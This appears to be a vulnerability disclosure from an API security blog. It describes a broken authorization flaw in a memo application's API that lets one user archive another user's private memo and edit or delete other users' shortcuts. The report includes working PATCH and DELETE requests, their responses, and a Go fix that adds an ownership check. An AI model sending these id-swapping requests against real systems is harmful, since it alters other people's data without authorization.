API Security Blog

Archive any private memos + Delete any Shortcut + Edit any Shortcut from other users

# Description
A user can archive any private memo, delete any shortcut, and edit any shortcut belonging to other users via the API, because the endpoints below do not check that the caller owns the object referenced by the id:
```
PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}
```
```
PATCH /api/shortcut/2 HTTP/1.1

{"id":2,"title":"shortahihix","payload":"[]"}
```
```
DELETE /api/shortcut/2
```

# Proof of Concept
Log in to the website in browser 1 as user A.

Log in to the website in browser 2 as user B.

Example: user B has a private memo with id 8.

Using user A's session in browser 1, make the request:

```
PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}
```
The response:
```
{"data":{"id":8,"rowStatus":"ARCHIVED","creatorId":1,"createdTs":1671805207,"updatedTs":1671805219,"content":"demo content","visibility":"PRIVATE","pinned":false,"displayTs":1671805207,"creator":{"id":1,"rowStatus":"NORMAL","createdTs":1671803462,"updatedTs":1671803845,"username":"userB","role":"HOST","email":"","nickname":"userB","openId":"","userSettingList":null},"resourceList":[]}}
```
The memo with id 8, owned by user B, is now archived even though the request was made with user A's session.

Demo video: [https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view](https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view)

# Similarly: Delete shortcut
Changing the id in the request returns the response `true`:
```
DELETE /api/shortcut/2 HTTP/1.1
Host: 127.0.0.1
```

# Similarly: Edit shortcut
Use this request to edit any shortcut by id:
```
PATCH /api/shortcut/2 HTTP/1.1

{"id":2,"title":"shortahihix","payload":"[]"}
```
The response received is as follows:
```
{"data":{"id":2,"rowStatus":"NORMAL","creatorId":0,"createdTs":1671875414,"updatedTs":1671875430,"title":"shortahihix","payload":"[]"}}
```
POC video for edit and delete shortcut: [https://drive.google.com/file/d/1sIQ-OLXlDqvMDXMSJvicy9QO7rZDFobW/view](https://drive.google.com/file/d/1sIQ-OLXlDqvMDXMSJvicy9QO7rZDFobW/view)
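The fix for all three endpoints is the same: resolve the object by id, then refuse the write unless the authenticated caller is its creator. The Go sketch below is an added example, not code from the affected application; `Store`, `Memo`, `Shortcut` and `ErrForbidden` are assumptions standing in for the real handlers and database layer.

```go
package main

import "errors"

// ErrForbidden is returned both when the object does not exist and when the
// caller does not own it, so the response does not reveal whether another
// user's object exists. (Constructed error for this example.)
var ErrForbidden = errors.New("forbidden")

// Memo and Shortcut carry the creatorId field seen in the report's responses;
// Store is a minimal in-memory stand-in for the application's database.
type Memo struct {
	ID, CreatorID int
	RowStatus     string
}
type Shortcut struct{ ID, CreatorID int }
type Store struct {
	Memos     map[int]*Memo
	Shortcuts map[int]*Shortcut
}

// ArchiveMemo backs PATCH /api/memo/{id} with rowStatus=ARCHIVED. The
// ownership check the report shows missing runs before any write: the
// authenticated caller (taken from the session, never from the body) must
// be the memo's creator.
func (s *Store) ArchiveMemo(callerID, memoID int) error {
	m, ok := s.Memos[memoID]
	if !ok || m.CreatorID != callerID {
		return ErrForbidden
	}
	m.RowStatus = "ARCHIVED"
	return nil
}

// DeleteShortcut backs DELETE /api/shortcut/{id} with the same check; the
// PATCH /api/shortcut/{id} edit handler follows the identical pattern.
func (s *Store) DeleteShortcut(callerID, shortcutID int) error {
	sc, ok := s.Shortcuts[shortcutID]
	if !ok || sc.CreatorID != callerID {
		return ErrForbidden
	}
	delete(s.Shortcuts, shortcutID)
	return nil
}
```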
